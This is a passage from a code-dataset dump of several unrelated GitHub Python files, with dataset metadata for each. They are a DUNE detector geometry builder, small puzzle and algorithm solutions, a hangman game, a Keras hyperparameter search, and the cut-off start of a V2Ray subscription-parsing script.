stave \", stave_id, \" and module \", module_id)\n\n stave_name = self.output_name + \"_stave%02i\" % (stave_id) + \"_module%02i\" % (module_id)\n stave_volname = self.output_name + \"_stave%02i\" % (stave_id) + \"_module%02i\" % (module_id) + \"_vol\"\n\n stave_shape = geom.shapes.Trapezoid(stave_name, dx1=min_dim_stave/2.0, dx2=max_dim_stave/2.0,\n dy1=(Ecal_Barrel_module_dim-safety)/2.0, dy2=(Ecal_Barrel_module_dim-safety)/2.0,\n dz=ecal_barrel_module_thickness/2.0)\n\n stave_lv = geom.structure.Volume(stave_volname, shape=stave_shape, material=self.material)\n\n zPos = Q(\"0mm\")\n layer_id = 1\n\n # check if angle is below -90/90 deg for full modules, otherwise thinner upstream ECAL\n if placing_angle < 315 and placing_angle > 45:\n for nlayer, type in zip(self.nLayers_Barrel, self.layer_builder_name):\n for ilayer in range(nlayer):\n\n layername = self.output_name + \"_stave%02i\" % (stave_id) + \"_module%02i\" % (module_id) + \"_layer_%02i\" % (layer_id)\n\n #Configure the layer length based on the zPos in the stave\n Layer_builder = self.get_builder(type)\n layer_thickness = NDHPgTPCLayerBuilder.depth(Layer_builder)\n l_dim_x = min_dim_stave + 2 * zPos * tan( pi/nsides )\n l_dim_y = Ecal_Barrel_module_dim - safety\n\n NDHPgTPCLayerBuilder.BarrelConfigurationLayer(Layer_builder, l_dim_x, l_dim_y, layername, sensname, \"Box\")\n NDHPgTPCLayerBuilder.construct(Layer_builder, geom)\n layer_lv = Layer_builder.get_volume(layername+\"_vol\")\n\n #Placement layer in stave\n layer_pos = geom.structure.Position(layername+\"_pos\", z=zPos + layer_thickness/2.0 - ecal_barrel_module_thickness/2.0)\n layer_pla = geom.structure.Placement(layername+\"_pla\", volume=layer_lv, pos=layer_pos)\n\n stave_lv.placements.append(layer_pla.name)\n\n zPos += layer_thickness;\n layer_id += 1\n else:\n nLoopLayers = self.nLayers_Barrel\n if self.buildThinUpstream:\n nLoopLayers = self.nLayers_Upstream\n\n for nlayer, type in zip(nLoopLayers, self.layer_builder_name):\n for ilayer in range(nlayer):\n\n layername = self.output_name + \"_stave%02i\" % (stave_id) + \"_module%02i\" % (module_id) + \"_layer_%02i\" % (layer_id)\n\n #Configure the layer length based on the zPos in the stave\n 
Layer_builder = self.get_builder(type)\n layer_thickness = NDHPgTPCLayerBuilder.depth(Layer_builder)\n l_dim_x = min_dim_stave + 2 * zPos * tan( pi/nsides )\n l_dim_y = Ecal_Barrel_module_dim - safety\n\n NDHPgTPCLayerBuilder.BarrelConfigurationLayer(Layer_builder, l_dim_x, l_dim_y, layername, sensname, \"Box\")\n NDHPgTPCLayerBuilder.construct(Layer_builder, geom)\n layer_lv = Layer_builder.get_volume(layername+\"_vol\")\n\n #Placement layer in stave\n layer_pos = geom.structure.Position(layername+\"_pos\", z=zPos + layer_thickness/2.0 - ecal_barrel_module_thickness/2.0)\n layer_pla = geom.structure.Placement(layername+\"_pla\", volume=layer_lv, pos=layer_pos)\n\n stave_lv.placements.append(layer_pla.name)\n\n zPos += layer_thickness;\n layer_id += 1\n\n #Placement staves in Barrel\n name = stave_lv.name\n\n #print \"Placing stave at x= \", (X*cos(phirot2)-Y*sin(phirot2))\n #print \"Placing stave at y= \", (X*sin(phirot2)+Y*cos(phirot2))\n\n pos = geom.structure.Position(name + \"_pos\", x=(X*cos(phirot2)-Y*sin(phirot2)), y=(X*sin(phirot2)+Y*cos(phirot2)), z=( imodule+0.5 )*Ecal_Barrel_module_dim - Barrel_halfZ )\n rot = geom.structure.Rotation(name + \"_rot\", x=pi/2.0, y=phirot+pi, z=Q(\"0deg\"))\n pla = geom.structure.Placement(name + \"_pla\", volume=stave_lv, pos=pos, rot=rot)\n\n barrel_lv.placements.append(pla.name)\n\n self.add_volume(barrel_lv)\n\n def construct_ecal_endcap_staves(self, geom):\n ''' construct a set of ECAL staves for the Endcap '''\n\n #ECAL Endcap inside the PV\n safety = Q(\"0.1mm\")\n ecal_endcap_module_thickness = self.get_ecal_endcap_module_thickness(geom)\n rInnerEcal = self.rInnerTPC - safety\n Barrel_halfZ = self.TPC_halfZ + safety\n\n EcalEndcap_inner_radius = Q(\"0mm\")\n EcalEndcap_outer_radius = rInnerEcal\n Ecal_Barrel_halfZ = Barrel_halfZ\n EcalEndcap_min_z = Ecal_Barrel_halfZ\n EcalEndcap_max_z = Ecal_Barrel_halfZ + ecal_endcap_module_thickness\n Ecal_Barrel_n_modules = self.nModules\n\n rmin = EcalEndcap_inner_radius\n rmax = EcalEndcap_outer_radius\n\n print(\"Quadrant side \", rmax)\n print(\"Endcap thickness \", ecal_endcap_module_thickness)\n\n #Mother volume Endcap\n endcap_shape_min = geom.shapes.Tubs(\"ECALEndcap_min\", rmin=rmin, rmax=rmax, dz=EcalEndcap_min_z, sphi=\"0deg\", dphi=\"360deg\")\n endcap_shape_max = geom.shapes.Tubs(\"ECALEndcap_max\", rmin=rmin, rmax=rmax, dz=EcalEndcap_max_z, sphi=\"0deg\", dphi=\"360deg\")\n\n endcap_shape = geom.shapes.Boolean( self.output_name, type='subtraction', first=endcap_shape_max, second=endcap_shape_min )\n endcap_lv = geom.structure.Volume( \"vol\"+self.output_name, shape=endcap_shape, material=self.material )\n\n # Place staves in the Endcap Volume\n sensname = self.output_name + \"_vol\"\n module_id = -1\n for iend in range(2):\n if iend == 0:\n module_id = 0\n else:\n module_id = Ecal_Barrel_n_modules + 1\n\n this_module_z_offset = (EcalEndcap_min_z + EcalEndcap_max_z)/2.\n if iend == 0:\n this_module_z_offset *= -1\n\n this_module_rotY = 0.;\n if iend == 0:\n this_module_rotY = pi;\n # this_module_rotY = pi;\n\n rotZ_offset = (pi/8. + 3.*pi/4.)\n if iend == 0:\n rotZ_offset = (pi/8. - pi/2.)\n # rotZ_offset = (pi/8. 
- pi/2.)\n\n for iquad in range(4):\n stave_id = iquad+1\n this_module_rotZ = 0\n if iend == 0:\n this_module_rotZ = rotZ_offset - (iquad-2) * pi/2.\n else:\n this_module_rotZ = rotZ_offset + (iquad+1) * pi/2.\n\n print(\"Placing stave \", stave_id, \" and module \", module_id)\n\n #Create a template module\n stave_name = self.output_name + \"_stave%02i\" % (stave_id) + \"_module%02i\" % (module_id)\n stave_volname = self.output_name + \"_stave%02i\" % (stave_id) + \"_module%02i\" % (module_id) + \"_vol\"\n\n endcap_stave_full = geom.shapes.Tubs(stave_name+\"_full\", sphi=Q(\"0deg\"), dphi=Q(\"360deg\"), rmin=rmin, rmax=rmax, dz=ecal_endcap_module_thickness)\n quadr = rmax\n quadrant = geom.shapes.Box(stave_name+\"_quadrant\", dx=quadr, dy=quadr, dz=ecal_endcap_module_thickness/2)\n\n endcap_stave_pos = geom.structure.Position(stave_name+\"_pos\", x=quadr, y=quadr, z=Q(\"0mm\"))\n endcap_stave_shape = geom.shapes.Boolean(stave_name, type='intersection', first=endcap_stave_full, second=quadrant, pos=endcap_stave_pos)\n endcap_stave_lv = geom.structure.Volume(stave_volname, shape=endcap_stave_shape, material=self.material)\n\n zPos = Q(\"0mm\")\n layer_id = 1\n\n for nlayer, type in zip(self.nLayers_Endcap, self.layer_builder_name):\n for ilayer in range(nlayer):\n layername = self.output_name + \"_stave%02i\" % (stave_id) + \"_module%02i\" % (module_id) + \"_layer_%02i\" % (layer_id)\n\n Layer_builder = self.get_builder(type)\n layer_thickness = NDHPgTPCLayerBuilder.depth(Layer_builder)\n NDHPgTPCLayerBuilder.EndcapConfigurationLayer(Layer_builder, 0, rmin, rmax, quadr, layername, sensname, \"IntersectionInside\")\n NDHPgTPCLayerBuilder.construct(Layer_builder, geom)\n layer_lv = Layer_builder.get_volume(layername+\"_vol\")\n\n # Placement layer in stave\n layer_pos = geom.structure.Position(layername+\"_pos\", z=zPos + layer_thickness/2.0 - ecal_endcap_module_thickness/2.0)\n layer_pla = geom.structure.Placement(layername+\"_pla\", volume=layer_lv, pos=layer_pos)\n\n endcap_stave_lv.placements.append(layer_pla.name)\n\n zPos += layer_thickness;\n layer_id += 1\n\n #Placement staves in Endcap\n name = endcap_stave_lv.name\n endcap_stave_pos = geom.structure.Position(name + \"_pos\", z=this_module_z_offset )\n endcap_stave_rot = geom.structure.Rotation(name + \"_rot\", x=Q(\"0deg\"), y=this_module_rotY, z=this_module_rotZ+pi/4)\n endcap_stave_pla = geom.structure.Placement(name + \"_pla\", volume=endcap_stave_lv, pos=endcap_stave_pos, rot=endcap_stave_rot)\n endcap_lv.placements.append(endcap_stave_pla.name)\n\n self.add_volume(endcap_lv)\n\n def construct_yoke(self, geom):\n '''Construct the Yoke'''\n\n safety = Q(\"1mm\")\n space = Q(\"1cm\")\n yoke_barrel_thickness = self.get_yoke_barrel_module_thickness(geom)\n rmin_barrel = self.CryostatOuterR + space\n # rmax_endcap = self.rInnerTPC + Q(\"1400mm\")\n rmax_endcap = rmin_barrel + yoke_barrel_thickness + safety\n ecal_endcap_module_thickness = self.get_ecal_endcap_module_thickness(geom)\n # YokeEndcap_min_z = self.get_pv_endcap_length(geom) + ecal_endcap_module_thickness + safety\n YokeEndcap_min_z = self.CryostatHalfLength + self.CryostatThickness + safety\n YokeEndcap_max_z = YokeEndcap_min_z + self.yokeThicknessEndcap + safety\n\n print(\"Construct PRY made of \", self.PRYMaterial, \" with a radius of \", rmin_barrel, \" a thickness of \", yoke_barrel_thickness, \" and a length of \", YokeEndcap_min_z*2)\n print(\"Build integrated Muon ID \", self.IntegratedMuID)\n\n '''Barrel'''\n byoke_name = \"YokeBarrel\"\n yoke_barrel_shape = 
geom.shapes.PolyhedraRegular(byoke_name, numsides=self.nsides_yoke, rmin=rmin_barrel, rmax=rmax_endcap, dz=YokeEndcap_min_z)\n yoke_barrel_vol = geom.structure.Volume(\"vol\"+byoke_name, shape=yoke_barrel_shape, material=\"Air\")\n\n #minimum dimension of the stave\n min_dim_stave = 2 * tan( pi/self.nsides_yoke ) * rmin_barrel\n #maximum dimension of the stave\n max_dim_stave = 2 * tan( pi/self.nsides_yoke ) * rmax_endcap\n Yoke_Barrel_n_modules = self.nModules_yoke\n Yoke_Barrel_module_dim = YokeEndcap_min_z * 2 / Yoke_Barrel_n_modules\n\n #Position of the stave in the Barrel (local coordinates)\n dphi = (2*pi/self.nsides_yoke)\n hphi = dphi/2;\n minus_deg = 0\n if self.nsides_yoke == 16:\n minus_deg = 11.25\n sensname = \"MuID\" + \"_vol\"\n\n ''' Normal stave '''\n for istave in range(self.nsides_yoke):\n\n X = rmin_barrel + yoke_barrel_thickness / 2.\n Y = Q('0mm')\n stave_id = istave+1\n dstave = int( self.nsides_yoke/4.0 )\n phirot = hphi + pi/2.0\n phirot += (istave - dstave)*dphi\n phirot2 = (istave - dstave) * dphi + hphi\n\n placing_angle = phirot2*180/pi+292.5 + minus_deg\n if placing_angle >= 360:\n placing_angle = placing_angle - 360\n\n xpos = X*cos(phirot2)-Y*sin(phirot2)\n ypos = X*sin(phirot2)+Y*cos(phirot2)\n\n #remove the stave(s) in front of the LAr\n #nsides = 8 -> stave 8\n #nsides = 16 -> stave 4,5,6\n set_stave = set(self.yoke_stave_to_remove)\n if stave_id in set_stave:\n print(\"Ignoring stave\", stave_id)\n continue\n\n # if stave_id > 2: continue\n\n print(\"Placing stave \", stave_id, \" at angle \", placing_angle, \" deg\")\n\n for imodule in range(Yoke_Barrel_n_modules):\n module_id = imodule+1\n print(\"Placing stave \", stave_id, \" and module \", module_id)\n\n stave_name = byoke_name + \"_stave%02i\" % (stave_id) + \"_module%02i\" % (module_id)\n stave_volname = byoke_name + \"_stave%02i\" % (stave_id) + \"_module%02i\" % (module_id) + \"_vol\"\n\n stave_shape = geom.shapes.Trapezoid(stave_name, dx1=min_dim_stave/2.0, dx2=max_dim_stave/2.0,\n dy1=(Yoke_Barrel_module_dim-safety)/2.0, dy2=(Yoke_Barrel_module_dim-safety)/2.0,\n dz=yoke_barrel_thickness/2.0)\n stave_lv = geom.structure.Volume(stave_volname, shape=stave_shape, material=self.PRYMaterial)\n\n if self.IntegratedMuID == True:\n zPos = Q(\"0mm\")\n layer_id = 1\n\n for nlayer, type in zip(self.MuID_nLayers, ['MuIDLayerBuilder']):\n for ilayer in range(nlayer):\n\n layername = byoke_name + \"_stave%02i\" % (stave_id) + \"_module%02i\" % (module_id) + \"_layer_%02i\" % (layer_id)\n\n print(\"Adding \", layername)\n\n #Configure the layer length based on the zPos in the stave\n Layer_builder = self.get_builder(type)\n layer_thickness = NDHPgTPCLayerBuilder.depth(Layer_builder)\n l_dim_x = min_dim_stave + 2 * zPos * tan( pi/self.nsides_yoke )\n l_dim_y = Yoke_Barrel_module_dim - safety\n\n NDHPgTPCLayerBuilder.BarrelConfigurationLayer(Layer_builder, l_dim_x, l_dim_y, layername, sensname, \"Box\")\n NDHPgTPCLayerBuilder.construct(Layer_builder, geom)\n layer_lv = Layer_builder.get_volume(layername+\"_vol\")\n\n #Placement layer in stave\n layer_pos = geom.structure.Position(layername+\"_pos\", z=zPos + layer_thickness/2.0 - yoke_barrel_thickness/2.0)\n layer_pla = geom.structure.Placement(layername+\"_pla\", volume=layer_lv, pos=layer_pos)\n\n stave_lv.placements.append(layer_pla.name)\n\n zPos += layer_thickness;\n layer_id += 1\n\n #Placement staves in Barrel\n name = stave_lv.name\n pos = geom.structure.Position(name + \"_pos\", x=xpos, y=ypos, z=( imodule+0.5 )*Yoke_Barrel_module_dim - 
YokeEndcap_min_z )\n rot = geom.structure.Rotation(name + \"_rot\", x=pi/2.0, y=phirot+pi, z=Q(\"0deg\"))\n pla = geom.structure.Placement(name + \"_pla\", volume=stave_lv, pos=pos, rot=rot)\n\n yoke_barrel_vol.placements.append(pla.name)\n\n self.add_volume(yoke_barrel_vol)\n\n if self.buildYokeEndcap:\n '''Endcaps'''\n #Mother volume Endcap\n yoke_endcap_shape_min = geom.shapes.PolyhedraRegular(\"YokeEndcap_min\", numsides=self.nsides_yoke, rmin=Q(\"0cm\"), rmax=rmax_endcap, dz=YokeEndcap_min_z)\n yoke_endcap_shape_max = geom.shapes.PolyhedraRegular(\"YokeEndcap_max\", numsides=self.nsides_yoke, rmin=Q(\"0cm\"), rmax=rmax_endcap, dz=YokeEndcap_max_z)\n\n eyoke_name = \"YokeEndcap\"\n yoke_endcap_shape = geom.shapes.Boolean( eyoke_name, type='subtraction', first=yoke_endcap_shape_max, second=yoke_endcap_shape_min )\n # yoke_endcap_vol = geom.structure.Volume( \"vol\"+eyoke_name, shape=yoke_endcap_shape, material=self.PRYMaterial)\n yoke_endcap_vol = geom.structure.Volume( \"vol\"+eyoke_name, shape=yoke_endcap_shape, material=\"Air\")\n\n for side in [\"L\", \"R\"]:\n #Create the volume for the endcaps\n yoke_thickness = YokeEndcap_max_z - YokeEndcap_min_z\n eyoke_name = eyoke_name + side\n eyoke_volname = \"vol\"+ eyoke_name\n yoke_endcap_shape_one = geom.shapes.PolyhedraRegular(eyoke_name, numsides=self.nsides_yoke, rmin=Q(\"0cm\"), rmax=rmax_endcap, dz=yoke_thickness/2.)\n yoke_endcap_lv = geom.structure.Volume( eyoke_volname, shape=yoke_endcap_shape_one, material=self.PRYMaterial)\n z_pos = YokeEndcap_max_z - yoke_thickness/2.\n if side == 'R':\n z_pos = -z_pos\n pos = geom.structure.Position(eyoke_name + side + \"_pos\", z=z_pos)\n rot = geom.structure.Rotation(eyoke_name + side + \"_rot\", z=Q(\"0deg\"))\n pla = geom.structure.Placement(eyoke_name + side + \"_pla\", volume=yoke_endcap_lv, pos=pos, rot=rot)\n yoke_endcap_vol.placements.append(pla.name)\n\n self.add_volume(yoke_endcap_vol)\n","repo_name":"gyang9/dunendggd","sub_path":"duneggd/Active/NDHPgTPC_SPYv3.py","file_name":"NDHPgTPC_SPYv3.py","file_ext":"py","file_size_in_byte":37605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"10613761701","text":"import unittest\n\n\ndef group_anagrams(word_list):\n anagrams = {}\n for w in word_list:\n sorted_word = \"\".join(sorted(w))\n if sorted_word in anagrams:\n anagrams[sorted_word].append(w)\n else:\n anagrams[sorted_word] = [w]\n\n res = []\n for sorted_word in anagrams:\n for word in anagrams[sorted_word]:\n res.append(word)\n\n return res\n\n\nclass GroupAnagramsTest(unittest.TestCase):\n def test_group_anagrams(self):\n wordList = [\"cheese\", \"ham\", \"hceese\", \"mha\", \"spam\"]\n expected = [\"cheese\", \"hceese\", \"ham\", \"mha\", \"spam\"]\n self.assertEqual(expected, group_anagrams(wordList))\n\n wordList2 = [\"hello\", \"world\", \"olleh\"]\n expected2 = [\"hello\", \"olleh\", \"world\"]\n self.assertEqual(expected2, group_anagrams(wordList2))\n","repo_name":"jcockbain/ctci-solutions","sub_path":"chapter-10/Q02_group_anagrams.py","file_name":"Q02_group_anagrams.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"5612053774","text":"import json\n\nSTEVILO_DOVOLJENIH_NAPAK = 10\n\nPRAVILNA_CRKA = '+'\nPONOVLJENA_CRKA = 'o'\nNAPACNA_CRKA = '-'\n\nZMAGA = 'W'\nPORAZ = 'X'\n\nZACETEK = 'Z'\n\n\nclass Vislice:\n datoteka_s_stanjem = 'stanje.json'\n\n def __init__(self):\n self.igre = {}\n \n def 
prost_id_igre(self):\n if self.igre:\n return max(self.igre) + 1 #self.igre gre direkt čez ključe\n else:\n return 0\n \n def nova_igra(self):\n igra = nova_igra()\n id = self.prost_id_igre()\n self.igre[id] = (igra, ZACETEK)\n return id\n\n def ugibaj(self, id_igre, crka):\n igra, stanje = self.igre[id_igre]\n stanje = igra.ugibaj(crka)\n self.igre[id_igre] = (igra, stanje)\n \n\n def nalozi_igre_iz_datoteke(self):\n with open(self.datoteka_s_stanjem, encoding='utf8') as f:\n igre = json.load(f)\n for id_igre in igre:\n geslo = igre[id_igre]['geslo']\n crke = igre[id_igre]['crke']\n stanje = igre[id_igre]['stanje']\n\n igra = Igra(geslo)\n igra.crke = crke\n\n self.igre[int(id_igre)] = (igra, stanje)\n\n def zapisi_igre_v_datoteko(self):\n igre = {}\n for id_igre in self.igre:\n igra, stanje = self.igre[id_igre]\n igre[id_igre] = {'geslo': igra.geslo, 'crke': igra.crke, 'stanje': stanje}\n with open(self.datoteka_s_stanjem, 'w', encoding='utf8') as f:\n json.dump(igre, f)\n\n\nclass Igra:\n\n def __init__(self, geslo):\n self.geslo = geslo\n self.crke = []\n \n\n def napacne_crke(self):\n return [c for c in self.crke if c.upper() not in self.geslo.upper()]\n\n def pravilne_crke(self):\n return [c for c in self.crke if c.upper() in self.geslo.upper()]\n\n \n def stevilo_napak(self):\n return len(self.napacne_crke()) #če kličemo metodo mormo povedat na čem je uporabljena\n \n\n def poraz(self):\n return self.stevilo_napak() > STEVILO_DOVOLJENIH_NAPAK\n\n def zmaga(self):\n return not self.poraz() and len(self.pravilne_crke()) == len(set(self.geslo))\n #tle je še neki naredu..\n\n def pravilni_del_gesla(self):\n pravilno = ''\n for crka in self.geslo.upper():\n if crka in self.crke:\n pravilno += crka\n else:\n pravilno += '_'\n return pravilno\n \n # return ''.join([c if c in self.crke else '_' for c in self.geslo.upper()])\n\n def nepravilni_ugibi(self):\n return ' '.join(self.napacne_crke())\n \n \n def ugibaj(self, crka):\n crka = crka.upper()\n\n if crka in self.crke:\n return PONOVLJENA_CRKA\n elif crka in self.geslo.upper():\n self.crke.append(crka)\n if self.zmaga():\n return ZMAGA\n else:\n return PRAVILNA_CRKA\n else:\n self.crke.append(crka)\n if self.poraz():\n return PORAZ\n else:\n return NAPACNA_CRKA\n\n\n\nwith open(\"besede.txt\", encoding='utf-8') as f:\n bazen_besed = f.read().split()\n\n#read vrne niz tega vsega, split pa razdeli po vseh 'praznih prostorih', ki se nahajajo..\n\nimport random \n\ndef nova_igra():\n geslo = random.choice(bazen_besed)\n return Igra(geslo)\n\n","repo_name":"mancaprosek/Vislice","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"sh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71889850680","text":"with open('day13_input.txt') as f:\n data = f.read()\n\nbuses = data.split()[1]\nall_buses = buses.split(',')\n\n# (bus number, time offset)\nbuses = [(int(b), all_buses.index(b)) for b in all_buses if b != 'x']\n\nt = 0\nmod = 1\nfor (id, offset) in buses:\n while t % id != -offset % id:\n t += mod\n mod *= id\n\nprint(t)\n","repo_name":"Colprit/AdventOfCode2020","sub_path":"13/day13_b.py","file_name":"day13_b.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8696214026","text":"\"\"\"\n1. 컨테이너와 박스를 오름차순으로 정렬\n2. 가장 큰 컨테이너와 가장 큰 박스를 비교해 옮길 수 있는지 확인\n3. 최소시간 구하기\n a. 
큰 수 부터 옮기기\n\"\"\"\n\nimport sys\n\ninput = sys.stdin.readline\nn = int(input())\nc = sorted(list(map(int, input().split())), reverse=True)\nm = int(input())\nb = sorted(list(map(int, input().split())), reverse=True)\n\nif b[0] > c[0]:\n print(-1)\n sys.exit()\n\nans = 0\n\nwhile b:\n ans += 1\n for i in c:\n flag = False\n for j in b:\n if i >= j:\n b.remove(j)\n flag = True\n break\n if not flag:\n break\nprint(ans)\n","repo_name":"vinivin153/problem-solving","sub_path":"100joon/Gold/1092.py","file_name":"1092.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19263408433","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[24]:\n\n\nimport tensorflow as tf \n(X_train, y_train), (X_test, y_test) = tf.keras.datasets.boston_housing.load_data()\n\n\n# In[25]:\n\n\nX_train.shape[1:]\n\n\n# In[26]:\n\n\nimport keras\ndef build_model(n_hidden=1, n_neurons=25, optimizer=\"sgd\", learning_rate=0.00001, momentum=0): \n model = tf.keras.models.Sequential()\n model.add(tf.keras.layers.InputLayer(X_train.shape[1:]))\n for i in range(0, n_hidden):\n model.add(keras.layers.Dense(n_neurons, activation=\"relu\")) \n model.add(tf.keras.layers.Dense(1)) \n if optimizer == \"sgd\":\n model.compile(optimizer=tf.keras.optimizers.SGD(learning_rate=learning_rate), loss=\"mse\", metrics=\"mae\") \n elif optimizer == \"nesterov\":\n model.compile(optimizer=tf.keras.optimizers.SGD(learning_rate=learning_rate, nesterov=True), loss=\"mse\", metrics=\"mae\")\n elif optimizer == \"momentum\":\n model.compile(optimizer=tf.keras.optimizers.SGD(learning_rate=learning_rate, momentum=momentum), loss=\"mse\", metrics=\"mae\") \n else:\n model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=learning_rate), loss=\"mse\", metrics=\"mae\")\n return model\n\n\n# In[43]:\n\n\nimport os\nimport time\nimport numpy as np \n\nearly_stopping=tf.keras.callbacks.EarlyStopping(patience=10, min_delta=1.00)\n\nroot_logdir = os.path.join(os.curdir, \"tb_logs\")\ndef get_run_logdir(name): \n run_id = name\n return os.path.join(root_logdir, run_id)\n\n\n# In[44]:\n\n\nimport pickle \ntf.keras.backend.clear_session()\nnp.random.seed(42)\ntf.random.set_seed(42)\n\nlearning_rates = [0.000001, 0.00001, 0.0001]\nresults=[]\nfor lr in learning_rates:\n name=\"\"\n name += str(int(time.time()))\n name += \"_lr_\"\n name += str(lr)\n run_logdir = get_run_logdir(name)\n tensorboard_cb = tf.keras.callbacks.TensorBoard(run_logdir)\n \n model = build_model(learning_rate=lr)\n model.fit(X_train, y_train, epochs=100, callbacks=[tensorboard_cb, early_stopping])\n result = model.evaluate(X_test, y_test)\n mse = result[0]\n mae = result[1]\n results.append((lr, mse, mae)) \nwith open(\"lr.pkl\", \"wb\") as file:\n pickle.dump(results, file)\n\n\n# In[29]:\n\n\nprint(results) \n\n\n# In[45]:\n\n\nresults = []\ntf.keras.backend.clear_session()\nnp.random.seed(42)\ntf.random.set_seed(42)\n\nfor hl in range(0,4):\n name=\"\"\n name += str(int(time.time()))\n name += \"_hl_\"\n name += str(hl)\n run_logdir = get_run_logdir(name)\n tensorboard_cb = tf.keras.callbacks.TensorBoard(run_logdir)\n \n model = build_model(n_hidden=hl)\n model.fit(X_train, y_train, epochs=100, callbacks=[tensorboard_cb, early_stopping])\n result = model.evaluate(X_test, y_test)\n mse = result[0]\n mae = result[1]\n results.append((hl, mse, mae)) \nwith open(\"hl.pkl\", \"wb\") as file:\n pickle.dump(results, file)\n\n\n# In[31]:\n\n\nprint(results) \n\n\n# 
In[46]:\n\n\nresults = []\ntf.keras.backend.clear_session()\nnp.random.seed(42)\ntf.random.set_seed(42)\n\nneurons_number = [5, 25, 125]\nfor nn in neurons_number:\n name=\"\"\n name += str(int(time.time()))\n name += \"_nn_\"\n name += str(nn)\n run_logdir = get_run_logdir(name)\n tensorboard_cb = tf.keras.callbacks.TensorBoard(run_logdir)\n \n model = build_model(n_neurons=nn)\n model.fit(X_train, y_train, epochs=100, callbacks=[tensorboard_cb, early_stopping])\n result = model.evaluate(X_test, y_test)\n mse = result[0]\n mae = result[1]\n results.append((nn, mse, mae))\nwith open(\"nn.pkl\", \"wb\") as file:\n pickle.dump(results, file)\n\n\n# In[33]:\n\n\nprint(results) \n\n\n# In[47]:\n\n\nresults = []\ntf.keras.backend.clear_session()\nnp.random.seed(42)\ntf.random.set_seed(42)\n\noptimizers = [\"sgd\", \"nesterov\", \"momentum\", \"adam\"]\nfor opt in optimizers:\n name=\"\"\n name += str(int(time.time()))\n name += \"_opt_\"\n name += opt\n run_logdir = get_run_logdir(name)\n tensorboard_cb = tf.keras.callbacks.TensorBoard(run_logdir)\n \n model = build_model(optimizer=opt, momentum=0.5)\n model.fit(X_train, y_train, epochs=100, callbacks=[tensorboard_cb, early_stopping])\n result = model.evaluate(X_test, y_test)\n mse = result[0]\n mae = result[1]\n results.append((opt, mse, mae))\nwith open(\"opt.pkl\", \"wb\") as file:\n pickle.dump(results, file)\n\n\n# In[35]:\n\n\nprint(results) \n\n\n# In[48]:\n\n\nresults = []\ntf.keras.backend.clear_session()\nnp.random.seed(42)\ntf.random.set_seed(42)\n\nmomentums = [0.1, 0.5, 0.9]\nfor mom in momentums:\n name=\"\"\n name += str(int(time.time()))\n name += \"_mom_\"\n name += str(mom)\n run_logdir = get_run_logdir(name)\n tensorboard_cb = tf.keras.callbacks.TensorBoard(run_logdir)\n \n model = build_model(optimizer=\"momentum\", momentum=mom)\n model.fit(X_train, y_train, epochs=100, callbacks=[tensorboard_cb, early_stopping])\n result = model.evaluate(X_test, y_test)\n mse = result[0]\n mae = result[1]\n results.append((mom, mse, mae)) \nwith open(\"mom.pkl\", \"wb\") as file:\n pickle.dump(results, file) \n\n\n# In[37]:\n\n\nprint(results) \n\n\n# In[38]:\n\n\nparam_distribs = {\n\"model__n_hidden\": [0, 1, 2, 3],\n\"model__n_neurons\": [5, 25, 125],\n\"model__learning_rate\": [0.000001, 0.00001, 0.0001],\n\"model__optimizer\": [\"sgd\", \"nesterov\", \"momentum\", \"adam\"],\n\"model__momentum\": [0.1, 0.5, 0.9]\n}\n\n\n# In[39]:\n\n\nimport scikeras\nfrom scikeras.wrappers import KerasRegressor\nes = tf.keras.callbacks.EarlyStopping(patience=10, min_delta=1.0, verbose=1)\nkeras_reg = KerasRegressor(build_model, callbacks=[es])\n\n\n# In[40]:\n\n\nfrom sklearn.model_selection import RandomizedSearchCV\nrnd_search_cv = RandomizedSearchCV(keras_reg, param_distribs, n_iter=30, cv=3, verbose=2)\nrnd_search_cv.fit(X_train, y_train, epochs=100, validation_split=0.1)\nrnd_search_cv.best_params_\n\n\n# In[41]:\n\n\nwith open(\"rnd_search.pkl\", \"wb\") as file:\n pickle.dump(rnd_search_cv.best_params_, file)\n\n\n# In[42]:\n\n\nrnd_search_cv.best_params_\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"ostrowskaanna/MachineLearningCourse","sub_path":"lab11/lab11.py","file_name":"lab11.py","file_ext":"py","file_size_in_byte":5851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37902706259","text":"#!/usr/local/bin/python3\n# -*- coding:utf-8 -*-\nimport base64\nimport json\nimport os\nimport random\nimport subprocess\nimport logging\nimport time\nfrom urllib import request\n\n# 配置信息\nurl = 
\"\"\nconfig_path = \"/etc/v2ray/config.json\"\nscripts_log = \"/opt/scripts/scripts.log\"\nlogging.basicConfig(filename=scripts_log, format=\"%(asctime)s-%(name)s-%(levelname)s-%(message)s\", level=logging.INFO)\n\nnet_test_lists = {\n\t\"https://www.google.com/\",\n\t\"https://www.facebook.com/\",\n\t\"https://www.youtube.com/\",\n\t\"https://www.ted.com/\",\n}\n\n\n# 获取订阅信息\ndef get_subscription(url, code=True):\n\t\"\"\"\n\t当code为Ture返回str,否则返回bytes类型\n\t:param url:\n\t:param code:\n\t:return:\n\t\"\"\"\n\tuser_agent = \"Mozilla/5.0 (Windows NT 10.0; WOW64) \\\nAppleWebKit/537.36 (KHTML, like Gecko) \\\nChrome/76.0.3809.132 Safari/537.36\"\n\ttry:\n\t\treq = request.Request(url)\n\t\treq.add_header('User-Agent', user_agent)\n\t\tresult = request.urlopen(req).read()\n\texcept Exception:\n\t\treturn None\n\tif code:\n\t\tresult = result.decode(\"utf-8\")\n\treturn result\n\n\n# 解析订阅信息\ndef parse_subscription(Subscription):\n\tresult = base64.b64decode(Subscription + '=' * (4 - len(Subscription) % 4))\n\tresult = result.decode(\"utf-8\")\n\tvmesses = result.splitlines()\n\treturn vmesses\n\n\n# 解析vmess为json\ndef 